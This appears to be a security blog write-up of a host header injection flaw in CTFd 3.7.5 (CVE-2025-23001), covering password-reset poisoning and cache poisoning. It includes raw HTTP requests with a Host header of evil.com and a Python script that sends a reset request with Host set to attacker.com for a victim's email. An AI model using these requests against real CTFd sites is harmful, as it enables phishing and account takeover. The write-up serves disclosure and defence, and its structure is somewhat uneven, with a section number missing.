CVE-2025-23001 - Host Header Injection in CTFd 3.7.5 — How This Severe Bug Endangers Your CTF Platform

---

CTFd is one of the most popular platforms for hosting Capture The Flag (CTF) competitions — thousands of schools, companies, and security communities use it. But if you’re running version 3.7.5, there’s a new and dangerous vulnerability: CVE-2025-23001. This post breaks it down in everyday language, shows you simple code examples, and explains how attackers could exploit this issue.

🔥 The Issue: Host Header Injection in CTFd 3.7.5

Host header injection happens when a web application trusts the Host header from incoming HTTP requests without proper validation. Attackers can manipulate this header to trick the application into generating malicious links, send phishing emails, poison caches, and more.

In CTFd 3.7.5, if you provide a crafted Host header in your HTTP request, CTFd uses your input throughout responses and emails without sufficient checks.

🛠️ Technical Explanation

When you reset your password or get account-related emails, CTFd builds links using the incoming HTTP Host header, like so:

url = f"{request.scheme}://{request.headers['Host']}/reset?token={token}"

If an attacker sets the Host header to a malicious domain (like evil.com), any password reset link or confirmation sent to users will use evil.com, not the actual CTFd site!

1. Password Reset Phishing

Let's say CTFd is hosted at ctfd.example.com, and Alice tries to reset her password. Here’s how an attacker (Mallory) might abuse the bug:

Malicious Password Reset Request

POST /reset HTTP/1.1
Host: evil.com
Content-Type: application/json

{"email":"alice@domain.tld"}

If CTFd uses the untrusted Host header, it sends Alice an email like

> Click here to reset your password.

Now, Alice clicks it and ends up at the attacker’s site, not the real CTFd!

Web caches may store responses based on the Host header. If a malicious Host header is injected

GET / HTTP/1.1
Host: evil.com

The cache server stores a page for evil.com. Anyone else using that cache and requesting the page could receive responses intended for evil.com.

3. Session Fixation or Cookie Manipulation

Cookies or session tokens issued with a malicious domain can also lead to stealing credentials.

Here’s a Python snippet using requests that demonstrates the vulnerability

import requests

reset_url = "https://ctfd.example.com/reset";
headers = {
    "Host": "attacker.com"
}
data = {
    "email": "victim@target.com"
}

response = requests.post(reset_url, headers=headers, json=data)
print(response.text)  # Will trigger CTFd to send malicious reset link to victim

📚 References

- CVE-2025-23001 at Mitre *(placeholder)*
- Original CTFd Repo
- OWASP Host Header Attack

Educate your users about suspicious password reset emails.

Don’t wait for an incident — check your CTFd now and close this dangerous loophole!


*Exclusive writeup by your security friend. Share with CTF organizers or anyone running CTFd!*

Timeline

Published on: 01/31/2025 17:15:16 UTC
Last modified on: 02/03/2025 17:15:26 UTC